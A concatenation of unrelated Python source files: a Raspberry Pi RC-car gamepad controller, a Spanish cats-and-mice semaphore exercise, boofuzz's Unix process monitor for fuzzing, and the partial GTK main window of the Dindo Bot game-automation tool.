GPIO.output(BUZZER_PIN, GPIO.HIGH)
time.sleep(delay_time)
GPIO.output(BUZZER_PIN, GPIO.LOW)
# TODO : Play out complex LED patterns async
def BUZZER_PATTERN(pattern_total, delay_time=0.5):
BUZZER_thread = threading.Thread(target=BACKGROUND_BUZZER_PATTERN, args=(pattern_total, delay_time))
BUZZER_thread.start()
GPIO.output(BUZZER_PIN,GPIO.HIGH)
BUZZER_PATTERN("b", 0.1)
RED_PIN = 10
GREEN_PIN = 11
BLUE_PIN = 9
GPIO.setup(RED_PIN,GPIO.OUT)
GPIO.setup(GREEN_PIN,GPIO.OUT)
GPIO.setup(BLUE_PIN,GPIO.OUT)
def BACKGROUND_LED_PATTERN(pattern_total, delay_time=0.5):
GPIO.output(RED_PIN,GPIO.HIGH)
GPIO.output(GREEN_PIN,GPIO.HIGH)
GPIO.output(BLUE_PIN,GPIO.HIGH)
for pattern in pattern_total:
GPIO.output(RED_PIN,GPIO.HIGH)
GPIO.output(GREEN_PIN,GPIO.HIGH)
GPIO.output(BLUE_PIN,GPIO.HIGH)
if "R" == str(pattern):
GPIO.output(RED_PIN,GPIO.LOW)
elif "G" == str(pattern):
GPIO.output(GREEN_PIN,GPIO.LOW)
elif "B" == str(pattern):
GPIO.output(BLUE_PIN,GPIO.LOW)
elif " " == str(pattern):
pass # All blank
time.sleep(delay_time)
GPIO.output(RED_PIN,GPIO.HIGH)
GPIO.output(GREEN_PIN,GPIO.HIGH)
GPIO.output(BLUE_PIN,GPIO.HIGH)
if (str(pattern_total).endswith("_")):
pattern = pattern_total[len(pattern_total)-2]
if "R" == str(pattern):
GPIO.output(RED_PIN,GPIO.LOW)
elif "G" == str(pattern):
GPIO.output(GREEN_PIN,GPIO.LOW)
elif "B" == str(pattern):
GPIO.output(BLUE_PIN,GPIO.LOW)
elif " " == str(pattern):
pass # All blank
# TODO : Play out complex LED patterns async
def LED_PATTERN(pattern_total, delay_time=0.5):
LED_thread = threading.Thread(target=BACKGROUND_LED_PATTERN, args=(pattern_total, delay_time))
LED_thread.start()
def connect_bluetooth_loop():
BUZZER_PATTERN("b b", 0.1)
# Bluetooth connect
while not bluetooth_connected():
LED_PATTERN("B B B B B_", 0.25)
os.system('./bluetooth_connect.sh')
time.sleep(10) # Wait
BUZZER_PATTERN("b b", 0.1)
LED_PATTERN("B B G G G G G_", 0.25)
def bluetooth_connected():
return "event0" in os.listdir("/dev/input/")
if not bluetooth_connected():
connect_bluetooth_loop()
global tank_controls
tank_controls = False;
def set_accel(accel_val):
if accel_val>0:
# Forward
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
else:
# Backwards
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
p.ChangeDutyCycle(abs(accel_val))
global last_out
last_out = ""
def tank_mover(steering_angle, accel_val):
global last_out
out = "[TANK] "
if accel_val>0:
# Forward
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
GPIO.output(tin1,GPIO.HIGH)
GPIO.output(tin2,GPIO.LOW)
elif accel_val<0:
# Backwards
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
GPIO.output(tin1,GPIO.LOW)
GPIO.output(tin2,GPIO.HIGH)
else:
if steering_angle>0:
# Pure Left
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.HIGH)
GPIO.output(tin1,GPIO.LOW)
GPIO.output(tin2,GPIO.HIGH)
else:
# Pure Right
GPIO.output(in1,GPIO.HIGH)
GPIO.output(in2,GPIO.LOW)
GPIO.output(tin1,GPIO.HIGH)
GPIO.output(tin2,GPIO.LOW)
p.ChangeDutyCycle(abs(steering_angle * 100))
tp.ChangeDutyCycle(abs(steering_angle * 100))
out = "p" + str(abs(steering_angle)) + "; tp" + str(abs(steering_angle))
if out!=last_out:
#log(out)
last_out = out
return
tf = (steering_angle + 1)
p.ChangeDutyCycle(abs(accel_val * tf/2.0))
tp.ChangeDutyCycle(abs(accel_val * (1 - abs(tf)/2.0) * 2))
out = "p" + str(abs(accel_val * tf)) + "; tp" + str(abs(accel_val * (1 - abs(tf))))
if out!=last_out:
#log(out)
last_out = out
def set_steering(steering_angle, accel_val=0):
steering_angle = steering_angle * -1
if steering_angle>0:
# Left
GPIO.output(tin1,GPIO.HIGH)
GPIO.output(tin2,GPIO.LOW)
else:
# Right
GPIO.output(tin1,GPIO.LOW)
GPIO.output(tin2,GPIO.HIGH)
tp.ChangeDutyCycle(abs(steering_angle)*100)
LAST_DATA = dict()
def autopilot_loop():
global LAST_DATA
while True:
try:
if AUTOPILOT:
prefs.set_pref("AUTOPILOT", "1")
now = time.time()
accel_val = 0
steering_angle = 0
try:
accel_val = float(prefs.get_pref("accel_val_auto"))
except:
log("accel_val_auto error")
pass
try:
steering_angle = float(prefs.get_pref("steering_angle_auto"))
except:
log("steering_angle_auto error")
pass
#accel_val, steering_angle = drive.telemetry(LAST_DATA, recorder.CURRENT_FRAME)
if abs(prefs.get_pref_time("accel_val_auto") - now) <= 0.5 or abs(prefs.get_pref_time("steering_angle_auto") - now) <= 0.5:
loop(accel_val, steering_angle)
LAST_DATA["accel_val"] = accel_val
LAST_DATA["steering_angle"] = steering_angle
LAST_DATA["speed"] = prefs.get_pref("speed") #chase_value(accel_val, LAST_DATA["speed"], 0.25)
#prefs.set_pref("speed", LAST_DATA["speed"])
else:
prefs.set_pref("AUTOPILOT", "0")
time.sleep(0.1)
except Exception as e:
log("AUTOPILOT - ", e)
AUTOPILOT_thread = threading.Thread(target=autopilot_loop)
AUTOPILOT_thread.start()
# PICS steering_angle speed throttle brakes
def loop(accel_val, steering_angle, rec_toggle=False):
global tank_controls
if rec_toggle:
if prefs.get_pref("rec")=="0":
BUZZER_PATTERN("b b b", 0.3)
LED_PATTERN("R R_")
log("Rec ON")
prefs.set_pref("rec", str(time.time()))
else:
BUZZER_PATTERN("b", 1)
LED_PATTERN("R R")
log("Rec OFF")
prefs.set_pref("rec", "0")
speed = prefs.get_pref("speed")
if AUTOPILOT:
#log("accel_val", round(accel_val, 3), "steering_angle", round(steering_angle, 3), "speed", speed, "[AUTOPilot]")
pass
else:
#log("accel_val", round(accel_val, 3), "steering_angle", round(steering_angle, 3), "speed", speed, "[MANUAL]")
pass
av = str(accel_val)
prefs.set_pref("accel_val", av)
sa = str(steering_angle)
prefs.set_pref("steering_angle", sa)
if tank_controls:
tank_mover(steering_angle, accel_val)
else:
set_accel(accel_val)
set_steering(steering_angle)
# Chase factor is a number less than 1. The larger it is, the more agressive is the chase
def chase_value(goal, chase, chase_factor=0.5):
return chase + (goal-chase)*chase_factor
def corrected_reading(val):
res = -1*(val-32767)/32767
if res < -1:
res = -1
if res > 1:
res = 1
res = round(res, 4)
return res
#import recorder
#CAMERA_thread = threading.Thread(target=recorder.start_camera_loop)
#CAMERA_thread.start()
from evdev import InputDevice, categorize, ecodes
#creates object 'gamepad' to store the data
#you can call it whatever you like
# TODO : Web interface to pair new device and
gamepad = InputDevice('/dev/input/event0')
#logs out device info at start
log(gamepad)
shutdown_request = 0
def main():
#global Camera
#Camera = c
global shutdown_request, AUTOPILOT, LAST_DATA
FIRST_COMMAND = True
while True:
try:
LAST_DATA["accel_val"] = 0 # 0 to 100
LAST_DATA["steering_angle"] = 0 # 0 to 1
LAST_DATA["speed"] = 0 # 0 to 100
accel_val = 0
steering_angle = 0
SPEED_MODE = 1
for event in gamepad.read_loop():
if FIRST_COMMAND:
BUZZER_PATTERN("b b", 0.1)
FIRST_COMMAND = False
#accel_val = 0
#steering_angle = 0
if event.code == 16 and event.value==-1 and event.type==3:
AUTOPILOT = True
BUZZER_PATTERN("b b b", 0.1)
LED_PATTERN("B B_")
if event.code == 16 and event.value==0 and event.type==3:
if AUTOPILOT:
AUTOPILOT = False
BUZZER_PATTERN("b b b", 0.1)
LED_PATTERN("G")
rec_toggle = False
if event.code == 16 and event.value==1 and event.type==3:
rec_toggle = True
if event.code == 17 and event.value==1 and event.type==3:
log("Compile event triggered")
BUZZER_PATTERN("b b", 0.1)
if prefs.get_pref("rec")=="0":
LED_PATTERN("B B")
os.system('python3 compile.py > logs/compile.txt &')
else:
LED_PATTERN("R R_", 0.25)
log("Did not fire compile [currently recording]")
now = time.time()
if event.code == 17 and event.value==-1 and event.type==3:
if shutdown_request==0:
log("Shutdown request triggered")
shutdown_request = now
LED_PATTERN("RB"*4, 0.25)
if event.code == 17 and event.value==0 and event.type==3:
if now - shutdown_request < 2 and shutdown_request!=0:
log("Shutdown request dropped")
LED_PATTERN("G_")
shutdown_request = 0
if shutdown_request!=0:
if now - shutdown_request >= 2: # Shutdown button pressed for 2 seconds or more
log("SHUTDOWN SIGNAL")
LED_PATTERN("R_")
BUZZER_PATTERN("b b b b b", 0.1)
time.sleep(0.5)
os.system("halt")
if event.type!=0:
#filters by event type
#log(type(event.code), event.code)
if event.code == 1:
accel_val = corrected_reading(event.value) * 100
elif event.code == 2:
steering_angle = corrected_reading(event.value)
elif event.code == 304: # A
SPEED_MODE = 1
elif event.code == 305: # B
SPEED_MODE = 2
elif event.code == 307: # X
SPEED_MODE = 3
elif event.code == 308: # Y
SPEED_MODE = 4
if abs(accel_val) > 25*SPEED_MODE:
if accel_val!=0: # To prevent divide by zero error
accel_val = 25*SPEED_MODE * accel_val / abs(accel_val)
else:
accel_val = 25*SPEED_MODE
loop(accel_val, steering_angle, rec_toggle)
LAST_DATA["accel_val"] = accel_val
LAST_DATA["steering_angle"] = steering_angle
except Exception as e:
log(e)
if ("No such device" in str(e)):
log("Bluetooth connection lost")
# TODO : Reconnect to BT
if __name__ == "__main__":
#from camera_pi import Camera
#main(Camera)
main()
|
cats_and_mice.py
|
# from time import sleep
from threading import Thread, Semaphore
from random import randint, choice
number_of_cats = 2
number_of_mice = 200
number_of_bowls = 15
mice_in_eating_zone = []
cats_in_eating_zone = []
mice_in_eating_zone_access = Semaphore(1)
cats_in_eating_zone_access = Semaphore(1)
permission_to_bowls = [Semaphore(1) for _ in range(number_of_bowls)]
permission_to_leave_for_cats = Semaphore(1)
permission_to_enter_for_cats = Semaphore(1)
permission_to_queue_up_for_bowl_zone = Semaphore(1)
def cat(id):
while True:
permission_to_queue_up_for_bowl_zone.acquire()
permission_to_enter_for_cats.acquire()
cats_in_eating_zone_access.acquire()
cats_in_eating_zone.append(id)
print(f'Gato {id} está entrando a zona de platos')
cats_in_eating_zone_access.release()
permission_to_enter_for_cats.release()
permission_to_queue_up_for_bowl_zone.release()
bowl_choice_index = randint(0, number_of_bowls - 1)
permission_to_bowl = permission_to_bowls[bowl_choice_index]
permission_to_bowl.acquire()
print(f'Gato {id} está comiendo de plato {bowl_choice_index}')
print(f'Gato {id} terminó de comer de plato {bowl_choice_index}')
permission_to_bowl.release()
permission_to_leave_for_cats.acquire()
cats_in_eating_zone_access.acquire()
cats_in_eating_zone.remove(id)
print(f'Gato {id} está dejando la zona de platos')
cats_in_eating_zone_access.release()
permission_to_leave_for_cats.release()
def mouse(id):
caught_by_cat = False
predator_cat = None
while not caught_by_cat and not predator_cat:
permission_to_queue_up_for_bowl_zone.acquire()
permission_to_queue_up_for_bowl_zone.release()
mice_in_eating_zone_access.acquire()
if len(mice_in_eating_zone) == 0:
permission_to_enter_for_cats.acquire()
permission_to_leave_for_cats.acquire()
cats_in_eating_zone_access.acquire()
if len(cats_in_eating_zone) > 0:
caught_by_cat = True
predator_cat = choice(cats_in_eating_zone)
cats_in_eating_zone_access.release()
mice_in_eating_zone.append(id)
print(f'Ratón {id} está entrando a zona de platos')
mice_in_eating_zone_access.release()
bowl_choice_index = randint(0, number_of_bowls - 1)
permission_to_bowl = permission_to_bowls[bowl_choice_index]
permission_to_bowl.acquire()
print(f'Ratón {id} está comiendo de plato {bowl_choice_index}')
print(f'Ratón {id} terminó de comer de plato {bowl_choice_index}')
permission_to_bowl.release()
mice_in_eating_zone_access.acquire()
mice_in_eating_zone.remove(id)
if caught_by_cat:
print(f'Ratón {id} murió a garras de Gato {predator_cat}')
else:
print(f'Ratón {id} está dejando la zona de platos')
if len(mice_in_eating_zone) == 0:
permission_to_enter_for_cats.release()
permission_to_leave_for_cats.release()
mice_in_eating_zone_access.release()
## Cuando hilos ratones empiezan primero
## Nótese que no hay inanición
for id in range(number_of_mice):
Thread(target = mouse, args = [id]).start()
for id in range(number_of_cats):
Thread(target = cat, args = [id]).start()
# ### Cuando hilos gatos empiezan primero
# for id in range(number_of_mice):
# Thread(target = mouse, args = [id]).start()
# for id in range(number_of_cats):
# Thread(target = cat, args = [id]).start()
# ### Cuando hilos gatos y ratones se inician a la par
# greater_number_of_animals = (
# number_of_cats
# if number_of_cats > number_of_mice
# else number_of_mice
# )
# for id in range(greater_number_of_animals):
# if id <= number_of_mice:
# Thread(target = mouse, args = [id]).start()
# if id <= number_of_cats:
# Thread(target = cat, args = [id]).start()
|
process_monitor_unix.py
|
import os
import sys
import getopt
import signal
import time
import threading
import subprocess
from boofuzz import pedrpc
'''
By nnp
http://www.unprotectedhex.com
This intended as a basic replacement for Sulley's process_monitor.py on *nix.
The below options are accepted. Crash details are limited to the signal that
caused the death and whatever operating system supported mechanism is in place (i.e
core dumps)
Replicated methods:
- alive
- log
- post_send
- pre_send
- start_target
- stop_target
- set_start_commands
- set_stop_commands
Limitations
- Cannot attach to an already running process
- Currently only accepts one start_command
- Limited 'crash binning'. Relies on the availability of core dumps. These
should be created in the same directory the process is ran from on Linux
and in the (hidden) /cores directory on OS X. On OS X you have to add
the option COREDUMPS=-YES- to /etc/hostconfig and then `ulimit -c
unlimited` as far as I know. A restart may be required. The file
specified by crash_bin will any other available details such as the test
that caused the crash and the signal received by the program
'''
USAGE = "USAGE: process_monitor_unix.py"\
"\n -c|--crash_bin File to record crash info too" \
"\n [-P|--port PORT] TCP port to bind this agent too"\
"\n [-l|--log_level LEVEL] log level (default 1), increase for more verbosity"\
"\n [-d|--coredump_dir dir] directory where coredumps are moved to "\
"\n (you may need to adjust ulimits to create coredumps)"
ERR = lambda msg: sys.stderr.write("ERR> " + msg + "\n") or sys.exit(1)
class DebuggerThread:
def __init__(self, start_command):
"""
This class isn't actually ran as a thread, only the start_monitoring
method is. It can spawn/stop a process, wait for it to exit and report on
the exit status/code.
"""
self.start_command = start_command
if isinstance(start_command, basestring):
self.tokens = start_command.split(' ')
else:
self.tokens = start_command
self.cmd_args = []
self.pid = None
self.exit_status = None
self.alive = False
def spawn_target(self):
print self.tokens
self.pid = subprocess.Popen(self.tokens).pid
self.alive = True
def start_monitoring(self):
"""
self.exit_status = os.waitpid(self.pid, os.WNOHANG | os.WUNTRACED)
while self.exit_status == (0, 0):
self.exit_status = os.waitpid(self.pid, os.WNOHANG | os.WUNTRACED)
"""
self.exit_status = os.waitpid(self.pid, 0)
# [0] is the pid
self.exit_status = self.exit_status[1]
self.alive = False
def get_exit_status(self):
return self.exit_status
def stop_target(self):
try:
os.kill(self.pid, signal.SIGKILL)
except OSError as e:
print e.errno
else:
self.alive = False
def is_alive(self):
return self.alive
class NIXProcessMonitorPedrpcServer(pedrpc.Server):
def __init__(self, host, port, cbin, coredump_dir, level=1):
"""
@type host: str
@param host: Hostname or IP address
@type port: int
@param port: Port to bind server to
@type cbin: str
@param cbin: Where to save monitored process crashes for analysis
"""
pedrpc.Server.__init__(self, host, port)
self.crash_bin = cbin
self.log_level = level
self.dbg = None
self.last_synopsis = None
self.test_number = 0
self.start_commands = []
self.stop_commands = []
self.proc_name = None
self.coredump_dir = coredump_dir
self.log("Process Monitor PED-RPC server initialized:")
self.log("Listening on %s:%s" % (host, port))
self.log("awaiting requests...")
# noinspection PyMethodMayBeStatic
def alive(self):
"""
Returns True. Useful for PED-RPC clients who want to see if the PED-RPC connection is still alive.
"""
return True
def log(self, msg="", level=1):
"""
If the supplied message falls under the current log level, print the specified message to screen.
@type msg: str
@param msg: Message to log
"""
if self.log_level >= level:
print "[%s] %s" % (time.strftime("%I:%M.%S"), msg)
def post_send(self):
"""
This routine is called after the fuzzer transmits a test case and returns the status of the target.
@rtype: bool
@return: Return True if the target is still active, False otherwise.
"""
if not self.dbg.is_alive():
exit_status = self.dbg.get_exit_status()
rec_file = open(self.crash_bin, 'a')
if os.WCOREDUMP(exit_status):
reason = 'Segmentation fault'
elif os.WIFSTOPPED(exit_status):
reason = 'Stopped with signal ' + str(os.WTERMSIG(exit_status))
elif os.WIFSIGNALED(exit_status):
reason = 'Terminated with signal ' + str(os.WTERMSIG(exit_status))
elif os.WIFEXITED(exit_status):
reason = 'Exit with code - ' + str(os.WEXITSTATUS(exit_status))
else:
reason = 'Process died for unknown reason'
self.last_synopsis = '[%s] Crash : Test - %d Reason - %s\n' % (
time.strftime("%I:%M.%S"),
self.test_number,
reason
)
rec_file.write(self.last_synopsis)
rec_file.close()
if self.coredump_dir is not None:
dest = os.path.join(self.coredump_dir, str(self.test_number))
src = self._get_coredump_path()
if src is not None:
self.log("moving core dump %s -> %s" % (src, dest))
os.rename(src, dest)
return self.dbg.is_alive()
def _get_coredump_path(self):
"""
This method returns the path to the coredump file if one was created
"""
if sys.platform == 'linux' or sys.platform == 'linux2':
path = './core'
if os.path.isfile(path):
return path
return None
def pre_send(self, test_number):
"""
This routine is called before the fuzzer transmits a test case and ensure the debugger thread is operational.
(In this implementation do nothing for now)
@type test_number: Integer
@param test_number: Test number to retrieve PCAP for.
"""
if not self.dbg:
self.start_target()
self.log("pre_send(%d)" % test_number, 10)
self.test_number = test_number
def start_target(self):
"""
Start up the target process by issuing the commands in self.start_commands.
@returns True if successful. No failure detection yet.
"""
self.log("starting target process")
self.dbg = DebuggerThread(self.start_commands[0])
self.dbg.spawn_target()
# prevent blocking by spawning off another thread to waitpid
t = threading.Thread(target=self.dbg.start_monitoring)
t.daemon = True
t.start()
self.log("done. target up and running, giving it 5 seconds to settle in.")
time.sleep(5)
return True
def stop_target(self):
"""
Kill the current debugger thread and stop the target process by issuing the commands in self.stop_commands.
"""
# give the debugger thread a chance to exit.
time.sleep(1)
self.log("stopping target process")
if len(self.stop_commands) < 1:
self.dbg.stop_target()
else:
for command in self.stop_commands:
if command == "TERMINATE_PID":
self.dbg.stop_target()
else:
os.system(command)
def restart_target(self):
"""
Stop and start the target process.
@returns True if successful.
"""
self.stop_target()
return self.start_target()
def set_start_commands(self, start_commands):
"""
We expect start_commands to be a list with one element for example
['/usr/bin/program arg1 arg2 arg3']
"""
if len(start_commands) > 1:
self.log("This process monitor does not accept > 1 start command")
return
self.log("updating start commands to: %s" % start_commands)
self.start_commands = start_commands
def set_stop_commands(self, stop_commands):
self.log("updating stop commands to: %s" % stop_commands)
self.stop_commands = stop_commands
def set_proc_name(self, proc_name):
self.log("updating target process name to '%s'" % proc_name)
self.proc_name = proc_name
def get_crash_synopsis(self):
"""
Return the last recorded crash synopsis.
@rtype: String
@return: Synopsis of last recorded crash.
"""
return self.last_synopsis
if __name__ == "__main__":
# parse command line options.
opts = None
try:
opts, args = getopt.getopt(sys.argv[1:], "c:P:l:d:", ["crash_bin=", "port=", "log_level=", "coredump_dir="])
except getopt.GetoptError:
ERR(USAGE)
log_level = 1
PORT = None
crash_bin = None
coredump_dir = None
for opt, arg in opts:
if opt in ("-c", "--crash_bin"):
crash_bin = arg
if opt in ("-P", "--port"):
PORT = int(arg)
if opt in ("-l", "--log_level"):
log_level = int(arg)
if opt in ("-d", "--coredump_dir"):
coredump_dir = arg
if not crash_bin:
ERR(USAGE)
if not PORT:
PORT = 26002
if coredump_dir is not None and not os.path.isdir(coredump_dir):
ERR("coredump_dir must be an existing directory")
# spawn the PED-RPC servlet.
servlet = NIXProcessMonitorPedrpcServer("0.0.0.0", PORT, crash_bin, coredump_dir, log_level)
servlet.serve_forever()
|
main.py
|
# Dindo Bot
# Copyright (c) 2018 - 2019 AXeL
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, GdkPixbuf, GObject
from lib import tools, logger, data, parser, settings, accounts, maps
from threads.bot import BotThread
from lib.shared import LogType, DebugLevel, __program_name__
from .dev import DevToolsWidget
from .custom import *
from .dialog import *
from threading import Thread
class BotWindow(Gtk.ApplicationWindow):
def __init__(self, title=__program_name__):
GObject.threads_init() # allow threads to update GUI
Gtk.Window.__init__(self, title=title)
logger.add_separator()
# Initialise class attributes
self.game_window = None
self.game_area = None
self.bot_path = None
self.bot_thread = None
self.args = tools.get_cmd_args()
# Get settings
self.settings = settings.load()
# Header Bar
self.create_header_bar(title)
# Tables
self.htable = Gtk.Table(1, 3, True) # horizontal table
self.vtable = Gtk.Table(4, 1, True) # vertical table
self.htable.attach(self.vtable, 1, 3, 0, 1)
self.add(self.htable)
# Tabs
self.create_tabs()
# Window
self.set_icon_from_file(tools.get_full_path('icons/drago.png'))
self.set_size_request(900, 700)
self.set_resizable(False)
self.connect('key-press-event', self.on_key_press)
self.connect('configure-event', self.on_resize_or_move)
self.connect('window-state-event', self.on_minimize)
self.connect('destroy', Gtk.main_quit)
self.show_all()
self.unplug_button.hide()
if not self.settings['Debug']['Enabled']:
self.debug_page.hide()
if not self.settings['Job']['EnablePodBar']:
self.podbar_box.hide()
if not self.settings['Job']['EnableMiniMap']:
self.minimap_box.hide()
def on_key_press(self, widget, event):
if self.settings['EnableShortcuts']:
# get keyname
keyname = Gdk.keyval_name(event.keyval)
ctrl = (event.state & Gdk.ModifierType.CONTROL_MASK)
alt = (event.state & Gdk.ModifierType.MOD1_MASK)
shift = (event.state & Gdk.ModifierType.SHIFT_MASK)
# handle shortcuts
for action in self.settings['Shortcuts']:
value = self.settings['Shortcuts'][action]
if value is not None:
keys = value.split('+')
if (len(keys) == 1 and keys[0] == keyname) or (len(keys) == 2 and ((keys[0] == 'Ctrl' and ctrl) or (keys[0] == 'Alt' and alt) or (keys[0] == 'Shift' and shift)) and keys[1] == keyname):
# run actions
if action == 'Start':
self.start_button.emit('clicked')
elif action == 'Pause':
self.pause_button.emit('clicked')
elif action == 'Stop':
self.stop_button.emit('clicked')
elif action == 'Minimize':
self.iconify()
elif action == 'Take Game Screenshot':
self.take_screenshot_button.emit('clicked')
elif action == 'Focus Game':
self.focus_game()
# stop event propagation
return True
# focus game
if self.bot_thread and self.bot_thread.isAlive():
self.focus_game()
def on_minimize(self, widget, event):
if event.window.get_state() == Gdk.WindowState.ICONIFIED:
self.pause_bot()
def on_resize_or_move(self, widget, event):
self.pause_bot()
def pop(self, text_buffer, max=100):
start_iter = text_buffer.get_start_iter()
end_iter = text_buffer.get_end_iter()
lines = text_buffer.get_text(start_iter, end_iter, True).splitlines()
if len(lines) >= max:
new_text = '\n'.join(lines[1:]) + '\n' # [1:] to remove the first line
text_buffer.set_text(new_text)
def log(self, text, type=LogType.Normal):
# pop first line if we reached the max number of lines
self.pop(self.log_buf)
# append to text view
position = self.log_buf.get_end_iter()
new_text = '[' + tools.get_time() + '] ' + text + '\n'
if type == LogType.Success:
self.log_buf.insert_with_tags(position, new_text, self.green_text_tag)
elif type == LogType.Error:
self.log_buf.insert_with_tags(position, new_text, self.red_text_tag)
elif type == LogType.Info:
self.log_buf.insert_with_tags(position, new_text, self.blue_text_tag)
else:
self.log_buf.insert(position, new_text)
# call logger
if type == LogType.Error:
logger.error(text)
else:
logger.new_entry(text)
def debug(self, text, level=DebugLevel.Normal):
# append to text view
if self.settings['Debug']['Enabled'] and level >= self.settings['Debug']['Level']:
self.pop(self.debug_buf)
position = self.debug_buf.get_end_iter()
self.debug_buf.insert(position, '[' + tools.get_time() + '] ' + text + '\n')
logger.debug(text)
def on_about_button_clicked(self, button):
dialog = AboutDialog(transient_for=self)
dialog.run()
def on_preferences_button_clicked(self, button):
dialog = PreferencesDialog(transient_for=self)
dialog.run()
def on_accounts_button_clicked(self, button):
dialog = AccountsDialog(transient_for=self)
dialog.run()
def on_take_screenshot_button_clicked(self, button):
if self.game_window:
screenshot_name = 'screenshot_' + tools.get_date_time()
screenshot_path = tools.get_full_path(screenshot_name)
tools.take_window_screenshot(self.game_window, screenshot_path)
self.log("Screenshot saved to '%s'" % screenshot_path, LogType.Info)
def create_header_bar(self, title):
### Header Bar
hb = Gtk.HeaderBar(title=title)
hb.pack_start(Gtk.Image(file=tools.get_full_path('icons/drago_24.png')))
hb.set_show_close_button(True)
self.set_titlebar(hb)
## Settings button
self.settings_button = Gtk.Button()
self.settings_button.set_image(Gtk.Image(icon_name='document-properties'))
self.settings_button.connect('clicked', lambda button: self.popover.show_all())
hb.pack_end(self.settings_button)
self.popover = Gtk.Popover(relative_to=self.settings_button, position=Gtk.PositionType.BOTTOM)
self.popover.set_border_width(2)
box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
self.popover.add(box)
# Preferences button
preferences_button = Gtk.ModelButton(' Preferences')
preferences_button.set_alignment(0, 0.5)
preferences_button.set_image(Gtk.Image(icon_name='preferences-desktop'))
preferences_button.connect('clicked', self.on_preferences_button_clicked)
box.add(preferences_button)
# Accounts button
accounts_button = Gtk.ModelButton(' Accounts')
accounts_button.set_alignment(0, 0.5)
accounts_button.set_image(Gtk.Image(icon_name='dialog-password'))
accounts_button.connect('clicked', self.on_accounts_button_clicked)
box.add(accounts_button)
# Take Game Screenshot button
self.take_screenshot_button = Gtk.ModelButton(' Take Game Screenshot')
self.take_screenshot_button.set_alignment(0, 0.5)
self.take_screenshot_button.set_image(Gtk.Image(icon_name='camera-photo'))
self.take_screenshot_button.set_sensitive(False)
self.take_screenshot_button.connect('clicked', self.on_take_screenshot_button_clicked)
box.add(self.take_screenshot_button)
# Open Log File button
open_log_button = Gtk.ModelButton(' Open Log File')
open_log_button.set_alignment(0, 0.5)
open_log_button.set_image(Gtk.Image(icon_name='text-x-generic'))
open_log_button.connect('clicked', lambda button: tools.open_file_in_editor(logger.get_filename()))
box.add(open_log_button)
# About button
about_button = Gtk.ModelButton(' About')
about_button.set_alignment(0, 0.5)
about_button.set_image(Gtk.Image(icon_name='help-about'))
about_button.connect('clicked', self.on_about_button_clicked)
box.add(about_button)
def log_view_auto_scroll(self, textview, event):
adj = textview.get_vadjustment()
adj.set_value(adj.get_upper() - adj.get_page_size())
def debug_view_auto_scroll(self, textview, event):
adj = textview.get_vadjustment()
adj.set_value(adj.get_upper() - adj.get_page_size())
def create_tabs(self):
log_notebook = Gtk.Notebook()
log_notebook.set_border_width(2)
self.vtable.attach(log_notebook, 0, 1, 3, 4)
bot_notebook = Gtk.Notebook()
bot_notebook.set_border_width(2)
self.htable.attach(bot_notebook, 0, 1, 0, 1)
# Log Tab/Page
log_page = Gtk.ScrolledWindow()
self.log_view = Gtk.TextView()
self.log_view.set_border_width(5)
self.log_view.set_editable(False)
self.log_view.set_wrap_mode(Gtk.WrapMode.WORD)
self.log_view.connect('size-allocate', self.log_view_auto_scroll)
self.log_buf = self.log_view.get_buffer()
self.red_text_tag = self.log_buf.create_tag('red', foreground='#dc3545')
self.green_text_tag = self.log_buf.create_tag('green', foreground='#28a745')
self.blue_text_tag = self.log_buf.create_tag('blue', foreground='#007bff')
log_page.add(self.log_view)
log_notebook.append_page(log_page, Gtk.Label('Log'))
# Debug Tab
self.debug_page = Gtk.ScrolledWindow()
self.debug_view = Gtk.TextView()
self.debug_view.set_border_width(5)
self.debug_view.set_editable(False)
self.debug_view.set_wrap_mode(Gtk.WrapMode.WORD)
self.debug_view.modify_bg(Gtk.StateType.NORMAL, Gdk.color_parse('black'))
self.debug_view.modify_fg(Gtk.StateType.NORMAL, Gdk.color_parse('white'))
self.debug_view.connect('size-allocate', self.debug_view_auto_scroll)
self.debug_buf = self.debug_view.get_buffer()
self.debug_page.add(self.debug_view)
log_notebook.append_page(self.debug_page, Gtk.Label('Debug'))
# Dev tools Tab
if '--dev' in self.args:
dev_tools_page = DevToolsWidget(self)
log_notebook.append_page(dev_tools_page, Gtk.Label('Dev Tools'))
log_notebook.show_all()
log_notebook.set_current_page(2)
### Bot Tab
bot_page = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
bot_page.set_border_width(10)
bot_notebook.append_page(bot_page, Gtk.Label('Bot'))
self.bot_widgets = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
bot_page.add(self.bot_widgets)
## Game Window
self.bot_widgets.add(Gtk.Label('<b>Game Window</b>', xalign=0, use_markup=True))
game_window_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
self.bot_widgets.add(game_window_box)
# ComboBox
self.game_window_combo = Gtk.ComboBoxText()
self.game_window_combo.set_margin_left(10)
self.populate_game_window_combo()
self.game_window_combo.connect('changed', self.on_game_window_combo_changed)
game_window_box.pack_start(self.game_window_combo, True, True, 0)
# Refresh
self.refresh_button = Gtk.Button()
self.refresh_button.set_image(Gtk.Image(icon_name='view-refresh'))
self.refresh_button.set_tooltip_text('Refresh')
self.refresh_button.connect('clicked', self.on_refresh_button_clicked)
game_window_box.add(self.refresh_button)
# Unplug
self.unplug_button = Gtk.Button()
self.unplug_button.set_image(Gtk.Image(icon_name='view-restore'))
self.unplug_button.set_tooltip_text('Unplug')
self.unplug_button.connect('clicked', self.on_unplug_button_clicked)
game_window_box.add(self.unplug_button)
# Plug
if '--dev' in self.args:
self.plug_button = Gtk.Button()
self.plug_button.set_image(Gtk.Image(icon_name='window-new-symbolic'))
self.plug_button.set_tooltip_text('Plug')
self.plug_button.connect('clicked', self.on_plug_button_clicked)
game_window_box.add(self.plug_button)
## Bot Path
self.bot_widgets.add(Gtk.Label('<b>Bot Path</b>', xalign=0, use_markup=True))
bot_path_filechooserbutton = FileChooserButton(title='Choose bot path', filter=('Bot Path', '*.path'))
bot_path_filechooserbutton.set_margin_left(10)
bot_path_filechooserbutton.set_current_folder(tools.get_full_path('paths'))
